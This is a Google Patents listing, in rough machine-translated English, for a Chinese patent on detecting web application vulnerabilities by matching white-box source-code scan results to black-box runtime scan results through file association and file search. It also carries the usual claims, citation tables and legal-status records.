CN103116543A - Web application safety detection method with white-box and black-box combined - Google Patents
Web application safety detection method with white-box and black-box combined Download PDFInfo
- Publication number
- CN103116543A CN103116543A CN2013100288480A CN201310028848A CN103116543A CN 103116543 A CN103116543 A CN 103116543A CN 2013100288480 A CN2013100288480 A CN 2013100288480A CN 201310028848 A CN201310028848 A CN 201310028848A CN 103116543 A CN103116543 A CN 103116543A
- Authority
- CN
- China
- Prior art keywords
- web application
- box
- white
- black
- carried out
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Images
Landscapes
- Examining Or Testing Airtightness (AREA)
Abstract
The invention provides a Web application safety detection method with a white-box and a black-box combined. The method includes the following steps: step 1, white-box testing is carried out on a Web application system; step 2, black-box testing is carried out on the Web application system; step 3, file association is carried out through K; step 4, file search is carried out through S; and step 5, integrity combination testing is carried out. The Web application safety detection method with the white-box and the black-box combined solves the problems that false alarm rates of the white-box testing on the Web application system are high and bug source code positions of the black-box testing can not be located.
Description
Technical field
The invention belongs to information security field, be specifically related to a kind of Web application safety detection method of white black box combination.
Background technology
Constantly bring forth new ideas and the development pole the earth of internet, applications have promoted social progress and the development of human civilization, have become one of major impetus of current social development.Information and network safety also is faced with the front Tough questions that has only, and the challenge that network safety filed faces is increasingly serious, and network security problem also is taken seriously day by day.
The biggest threat of the network security on ordinary meaning is the leak on web application, and the web application Hole Detection mainly is divided into Black-box Testing and this two large class of white-box testing at present.
Black-box Testing is mainly the test of carrying out when web application is moved, and it detects and relies on external environment condition and test case, has certain uncertainty, but has advantages of that rate of false alarm is low.When the daily life function of web application was tested, security take Black-box Testing as main, was mainly all types of safety problems to mainly needing in following Web platform test to pay close attention to.
The XSS cross-site scripting attack, XSS is again CSS, english abbreviation is Cross Site Script, the Chinese meaning is cross-site scripting attack, particular content refers to malicious attacker and insert malice html code in the Web application system page, when the user browses in this page, embed wherein that the html code of Web the inside can be performed, thereby reach the specific purposes of malicious user.
SQL injects problem; in the code of Web application system; situation the about legitimacy of user input data not being verified often can appear; allow like this malicious user have an opportunity to take advantage of; the user can submit the database statement fragment to; the result of returning according to program, or even abnormal information obtains the useful datas such as database information, this is known as SQL and injects.
The mutual safety problem of service end, the general reason of this class problem are also filtration treatment not to be carried out in user's input cause, and through this leak, the assailant can carry out any system command in service end, destroys the Web application system.
White-box testing mainly refers to the static father code analysis techniques, the web application source code is analyzed line by line, use the various analysis such as lexical analysis, data-flow analysis, control flow analysis to find out the code security defective, can avoid above-mentioned deficiency, but have the shortcoming of higher rate of false alarm.
Data-flow analysis is the technology of using in when compiling, it can be from program code semantic information and the method by algebraically of collection procedure determine definition and the use of variable when compiling.Data-flow analysis is used to solve the problems such as compile optimization, program verification, debugging, test, parallel, vectorization and serial programming environment.
The basic skills of control flow analysis is the fundamental block of sign program, and the digraph of structure reflection programmed control flow process is analyzed the controlled structural information of this digraph.Therefore, control flow analysis is based upon on two basic entities: fundamental block and control flow graph.
Lexical analysis not only refers to realize the grammatical analysis in compiler, also comprises simple syntax and semantics analysis.By code is carried out lexical analysis, then extract interested content in the property data base and carry out simple contextual analysis, reported to the police in problematic position.Property data base comprises is mainly the function that can produce safety problem, gets for example, strcpy, printf/sprint/snprintf etc.For different objective functions, the lexical analysis meeting is called different processing functions the parameter of dangerous function is analyzed.
Summary of the invention
For overcoming defects, the invention provides a kind of Web application safety detection method of white black box combination, solve the Web application system is carried out the high rate of false alarm of white-box testing and the problem that can't locate leak source code position of Black-box Testing.
For achieving the above object, the invention provides a kind of Web application safety detection method of white black box combination, its improvements are, described method comprises the steps:
(1). the Web application system is carried out white-box testing;
(2). the Web application system is carried out Black-box Testing;
(3). carry out file association by K;
(4). carry out ff by S;
(5). whole in conjunction with test.
In optimal technical scheme provided by the invention, in described step 1, W is disposed, draw WS, wherein DUT is measurand.
In the second optimal technical scheme provided by the invention, in described step 2, B is disposed, draw BS, wherein DUT is measurand.
In the 3rd optimal technical scheme provided by the invention, in described step 3, use K that WS-nF and PF are carried out related, obtain KF.
In the 4th optimal technical scheme provided by the invention, in described step 4, use S in the WS-nF as a result KF related with PF, search the BS-nF file, judge by F whether successfully whole process.
In the 5th optimal technical scheme provided by the invention, described step 5 comprises the steps:
(5-1). dispose DUT, draw WS by using W that DUT is scanned, draw BS by using B that DUT is scanned;
(5-2). use K to carry out file association to the file WS-nF that takes out certain WS-n in WS and PF and draw KF;
(5-3). use S that the file BS-nF of certain BS-n in taking-up BS is surpassed in KF and look for, the F that obtains a result determines by judging F whether whole process is successful.
Compared with the prior art, the Web application safety detection method of a kind of white black box combination provided by the invention, can pass through certain testing process, and introducing file association matching technique K, realize the white Black-box Testing combination of Web application system, solve the Web application system is carried out the high rate of false alarm of white-box testing and the problem that can't locate leak source code position of Black-box Testing.
Description of drawings
Fig. 1 is for carrying out the logical diagram of direct-detection by W.
Fig. 2 is for carrying out the logical diagram of direct-detection by B.
Fig. 3 is for carrying out the results model figure of direct-detection by W.
Fig. 4 is for carrying out the results model figure of direct-detection by B.
Fig. 5 is for to carry out related procedural model figure by K with WS-nF and PF.
Fig. 6 is for searching BS-nF document flow illustraton of model by use S in KF.
Fig. 7 is the process flow diagram of the Web application safety detection method of white black box combination.
Embodiment
Character is carried out as giving a definition:
W: white-box testing.
WT: the technology set that white-box testing uses, certain technology WT-n wherein (n=1,2,3.....) expression.
B: Black-box Testing.
P: testing process.
DUT: tested target Web application system.
C:Web application system source code.
The set of PF:Web application system source code file, certain result PF-n wherein (n=1,2,3.....) expression.
WS: the results set of white-box testing, certain result WS-n wherein (n=1,2,3.....) expression.
BS: the results set of Black-box Testing, certain result BS-n wherein (n=1,2,3.....) expression.
LS: leak set, certain result LS-n wherein (n=1,2,3.....) expression.
WS-nF: the file at certain leak place in the white-box testing result.
BS-nF: the file at certain leak place in the Black-box Testing result, this leak is identical with the leak type of WS-nF.
K: the file association matching technique, with white box gordian technique that Black-box Testing result in source code file positioned related with the Black-box Testing result.
KF: by the associated with set that K finds out, certain result KF-n wherein (n=1,2,3.....) expression.
S: ff technology.
F: use S whether to find the sign of BS-nF in KF.
As shown in Figure 7, a kind of Web application safety detection method of white black box combination comprises the steps:
(1). the Web application system is carried out white-box testing;
(2). the Web application system is carried out Black-box Testing;
(3). carry out file association by K;
(4). carry out ff by S;
(5). whole in conjunction with test.
In described step 1, W is disposed, draw WS, wherein DUT is measurand.
In described step 2, B is disposed, draw BS, wherein DUT is measurand.
In described step 3, use K that WS-nF and PF are carried out related, obtain KF.
In described step 4, use S in the WS-nF as a result KF related with PF, search the BS-nF file, judge by F whether successfully whole process.
Described step 5 comprises the steps:
(5-1). dispose DUT, draw WS by using W that DUT is scanned, draw BS by using B that DUT is scanned;
(5-2). use K to carry out file association to the file WS-nF that takes out certain WS-n in WS and PF and draw KF;
(5-3). use S that the file BS-nF of certain BS-n in taking-up BS is surpassed in KF and look for, the F that obtains a result determines by judging F whether whole process is successful.
Web application safety detection method by the combination of following examples dialogue black box is done further explanation.
The main treatment scheme of the Web application system being carried out white Black-box Testing combination technology is:
The Web application system is carried out white-box testing
Carry out the project organization of direct-detection model according to the W of Fig. 1, W is disposed, draw WS, wherein DUT is measurand.
The Web application system is carried out Black-box Testing
Carry out the project organization of direct-detection model according to the B of Fig. 2, B is disposed, draw BS, wherein DUT is measurand.
Carry out file association by K
According to the file association basic model of Fig. 5, use K that WS-nF and PF are carried out related, obtain KF.
Carry out ff by S
According to the ff basic model of Fig. 6, use S in the WS-nF as a result KF related with PF, search the BS-nF file, judge by F whether successfully whole process.
Whole in conjunction with test
Structure according to Fig. 7, dispose DUT, at first draw WS by using W that DUT is scanned, drawing BS by using B that DUT is scanned, then use K to carry out file association to the file WS-nF that takes out certain WS-n in WS and PF and draw KF, use at last S that the file BS-nF of certain BS-n in taking-up BS is surpassed in KF and look for, the F that obtains a result determines by judging F whether whole process is successful.
What need statement is that content of the present invention and embodiment are intended to prove the practical application of technical scheme provided by the present invention, should not be construed as the restriction to protection domain of the present invention.Those skilled in the art can do various modifications, be equal to and replace or improve inspired by the spirit and principles of the present invention.But these changes or modification are all in the protection domain that application is awaited the reply.
Claims (6)
1. the Web application safety detection method of a white black box combination, is characterized in that, described method comprises the steps:
(1). the Web application system is carried out white-box testing;
(2). the Web application system is carried out Black-box Testing;
(3). carry out file association by K;
(4). carry out ff by S;
(5). whole in conjunction with test.
2. system according to claim 1, is characterized in that, in described step 1, W disposed, and draws WS, and wherein DUT is measurand.
3. system according to claim 1, is characterized in that, in described step 2, B disposed, and draws BS, and wherein DUT is measurand.
4. system according to claim 1, is characterized in that, in described step 3, uses K that WS-nF and PF are carried out related, obtains KF.
5. system according to claim 1, is characterized in that, in described step 4, uses S in the WS-nF as a result KF related with PF, searches the BS-nF file, judges by F whether successfully whole process.
6. system according to claim 1, is characterized in that, described step 5 comprises the steps:
(5-1). dispose DUT, draw WS by using W that DUT is scanned, draw BS by using B that DUT is scanned;
(5-2). use K to carry out file association to the file WS-nF that takes out certain WS-n in WS and PF and draw KF;
(5-3). use S that the file BS-nF of certain BS-n in taking-up BS is surpassed in KF and look for, the F that obtains a result determines by judging F whether whole process is successful.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201310028848.0A CN103116543B (en) | 2013-01-25 | 2013-01-25 | The Web application safety detection method that white black box combines |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201310028848.0A CN103116543B (en) | 2013-01-25 | 2013-01-25 | The Web application safety detection method that white black box combines |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN103116543A true CN103116543A (en) | 2013-05-22 |
| CN103116543B CN103116543B (en) | 2015-11-18 |
Family
ID=48414923
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201310028848.0A Active CN103116543B (en) | 2013-01-25 | 2013-01-25 | The Web application safety detection method that white black box combines |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN103116543B (en) |
Cited By (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN104346573A (en) * | 2013-07-31 | 2015-02-11 | 广州市品高软件开发有限公司 | Method and device for realizing WEB application system information security frame |
| CN110119616A (en) * | 2019-04-18 | 2019-08-13 | 广州市品高软件股份有限公司 | WEB application security protection system |
| CN110162980A (en) * | 2019-05-31 | 2019-08-23 | 上交所技术有限责任公司 | A kind of method of one-stop safety test and management in software development process |
| CN112269745A (en) * | 2020-11-09 | 2021-01-26 | 北京嘀嘀无限科技发展有限公司 | Test case processing method, device, equipment and storage medium |
Citations (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US6249882B1 (en) * | 1998-06-15 | 2001-06-19 | Hewlett-Packard Company | Methods and systems for automated software testing |
| CN101241467A (en) * | 2008-03-05 | 2008-08-13 | 罗笑南 | Automatized white box test system and method facing to WEB application |
-
2013
- 2013-01-25 CN CN201310028848.0A patent/CN103116543B/en active Active
Patent Citations (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US6249882B1 (en) * | 1998-06-15 | 2001-06-19 | Hewlett-Packard Company | Methods and systems for automated software testing |
| CN101241467A (en) * | 2008-03-05 | 2008-08-13 | 罗笑南 | Automatized white box test system and method facing to WEB application |
Non-Patent Citations (1)
| Title |
|---|
| 项颖: ""基于AHP算法的WEB安全性测试工具的设计与实现", 《中国优秀硕士学位论文全文数据库信息科技辑》, no. 2, 15 February 2012 (2012-02-15), pages 22 - 45 * |
Cited By (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN104346573A (en) * | 2013-07-31 | 2015-02-11 | 广州市品高软件开发有限公司 | Method and device for realizing WEB application system information security frame |
| CN110119616A (en) * | 2019-04-18 | 2019-08-13 | 广州市品高软件股份有限公司 | WEB application security protection system |
| CN110119616B (en) * | 2019-04-18 | 2021-05-28 | 广州市品高软件股份有限公司 | WEB application security protection system |
| CN110162980A (en) * | 2019-05-31 | 2019-08-23 | 上交所技术有限责任公司 | A kind of method of one-stop safety test and management in software development process |
| CN110162980B (en) * | 2019-05-31 | 2023-04-18 | 上交所技术有限责任公司 | One-stop safety testing and managing method in software development process |
| CN112269745A (en) * | 2020-11-09 | 2021-01-26 | 北京嘀嘀无限科技发展有限公司 | Test case processing method, device, equipment and storage medium |
Also Published As
| Publication number | Publication date |
|---|---|
| CN103116543B (en) | 2015-11-18 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| Wang et al. | Behavior based software theft detection | |
| Wang et al. | Detecting software theft via system call based birthmarks | |
| Shar et al. | Automated removal of cross site scripting vulnerabilities in web applications | |
| CN104077531B (en) | System vulnerability appraisal procedure, device and system based on open vulnerability assessment language | |
| Luo et al. | Polar: Function code aware fuzz testing of ics protocol | |
| Junjin | An approach for SQL injection vulnerability detection | |
| Djuric | A black-box testing tool for detecting SQL injection vulnerabilities | |
| Beaman et al. | Fuzzing vulnerability discovery techniques: Survey, challenges and future directions | |
| Izquierdo et al. | Collaboro: a collaborative (meta) modeling tool | |
| CN103577323B (en) | Based on the software plagiarism detection method of dynamic keyword instruction sequence birthmark | |
| Tian et al. | DKISB: Dynamic key instruction sequence birthmark for software plagiarism detection | |
| CN104184728A (en) | Safety detection method and device for Web application system | |
| KR101640479B1 (en) | Software vulnerability attack behavior analysis system based on the source code | |
| Mitropoulos et al. | Fatal injection: A survey of modern code injection attack countermeasures | |
| CN103116543B (en) | The Web application safety detection method that white black box combines | |
| Gauthier et al. | Extraction and comprehension of moodle's access control model: A case study | |
| CN116932381A (en) | Automatic evaluation method for security risk of applet and related equipment | |
| Shi et al. | Backporting security patches of web applications: A prototype design and implementation on injection vulnerability patches | |
| US20240045956A1 (en) | Malicious source code detection | |
| Tamrawi et al. | Projected control graph for computing relevant program behaviors | |
| US8726246B2 (en) | Static analysis of validator routines | |
| Zheng et al. | Research and implementation of web application system vulnerability location technology | |
| Windsor et al. | High‐coverage metamorphic testing of concurrency support in C compilers | |
| Al-Taharwa et al. | Drive-by disclosure: a large-scale detector of drive-by downloads based on latent behavior prediction | |
| CN105320890B (en) | A kind of source code leak detection method based on grouping DFA |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| C10 | Entry into substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| C14 | Grant of patent or utility model | ||
| GR01 | Patent grant | ||
| C41 | Transfer of patent application or patent right or utility model | ||
| TR01 | Transfer of patent right |
Effective date of registration: 20160427 Address after: 100192 Beijing city Haidian District Qinghe small Camp Road No. 15 Patentee after: China Electric Power Research Institute Patentee after: State Grid Smart Grid Institute Patentee after: State Grid Corporation of China Address before: 100192 Beijing city Haidian District Qinghe small Camp Road No. 15 Patentee before: China Electric Power Research Institute Patentee before: State Grid Corporation of China |
|
| C56 | Change in the name or address of the patentee | ||
| CP01 | Change in the name or title of a patent holder |
Address after: 100192 Beijing city Haidian District Qinghe small Camp Road No. 15 Patentee after: China Electric Power Research Institute Patentee after: GLOBAL ENERGY INTERCONNECTION RESEARCH INSTITUTE Patentee after: State Grid Corporation of China Address before: 100192 Beijing city Haidian District Qinghe small Camp Road No. 15 Patentee before: China Electric Power Research Institute Patentee before: State Grid Smart Grid Institute Patentee before: State Grid Corporation of China |